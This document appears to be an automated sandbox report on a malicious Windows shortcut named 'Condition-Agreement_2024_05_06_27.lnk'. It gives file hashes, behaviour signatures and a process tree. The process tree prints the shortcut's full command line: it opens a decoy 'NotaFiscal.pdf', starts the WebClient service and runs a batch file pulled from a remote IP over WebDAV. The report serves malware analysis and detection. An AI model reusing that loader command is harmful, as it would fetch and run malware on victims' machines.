Analysis

  • max time kernel
    119s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20240215-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240215-en, locale:en-us, os:windows7-x64, system
  • submitted
    08/05/2024, 07:42

General

  • Target

    Condition-Agreement_2024_05_06_27.lnk

  • Size

    2KB

  • MD5

    a497662f623efb41bcf7c05b6571edfe

  • SHA1

    c1b3a6927f8032d0052ff9a118c16e55a9f97dea

  • SHA256

    132f8d12421381a77b9d164a90c155b05c9f57fd3a2e79a5a2a50c183b8bb4e5

  • SHA512

    d955dda82d9349aeceb27d29ed09816d9773cff050abdbcd928d66b1532c1adc4c0f454a8c027b67fa13e8157674a1edacff884ccd35f4b4652cf5241d12a1a3

Score
4/10

Malware Config

Signatures

  • Launches sc.exe 1 IoCs

    Sc.exe is a Windows utility to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\Condition-Agreement_2024_05_06_27.lnk
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2744
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" "/min /c "echo Visualizacao indisponivel > C:\Users\Admin\\downloads\\NotaFiscal.pdf && start C:\Users\Admin\\downloads\\NotaFiscal.pdf && start sc start webclient && ping localhost -n 7 && start /min cmd.exe /c \\38.180.136.158@80\vHRfeSre\Offer202412.bat"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2932
      • C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
        "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\Downloads\NotaFiscal.pdf"
        3⤵
        • Suspicious behavior: CmdExeWriteProcessMemorySpam
        • Suspicious behavior: GetForegroundWindowSpam
        • Suspicious use of SetWindowsHookEx
        PID:2476
      • C:\Windows\system32\sc.exe
        sc start webclient
        3⤵
        • Launches sc.exe
        PID:2044
      • C:\Windows\system32\PING.EXE
        ping localhost -n 7
        3⤵
        • Runs ping.exe
        PID:2440
      • C:\Windows\system32\cmd.exe
        cmd.exe /c \\38.180.136.158@80\vHRfeSre\Offer202412.bat
        3⤵
        PID:1460

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents

    Filesize

    3KB

    MD5

    51468201884927ab944df694045be2ca

    SHA1

    5d24a941358bdda5150c4cef8f624c240615e366

    SHA256

    a8a3800c94efc05ca45b3d919d2c1930427bc41e23ab4a99864895ca57c54c19

    SHA512

    ea93371ac98ac8dc9ad57586b759f78738ac535cfc2b4ebde9f448bfd3dd92aaaa36d55aa327cb21ce6b0af22715c655b64a692e4be0b19da53bb05e502c9b06

  • C:\Users\Admin\Downloads\NotaFiscal.pdf

    Filesize

    29B

    MD5

    823a9caa296579d6a40cd5195d969727

    SHA1

    5592813787ecff9133229439498d624339c07ece

    SHA256

    60b827294f341e5f200c6512b976cac056a592ac1abdd932af8abff314b7bb0e

    SHA512

    77ec77b000d5d230071a101954968f585ceed9e589652af38411d14b594a7432b610ef9c8b7d1c9256a5e6fe5eeda53d017a4c6d840c987b884b9cca17d7e0bc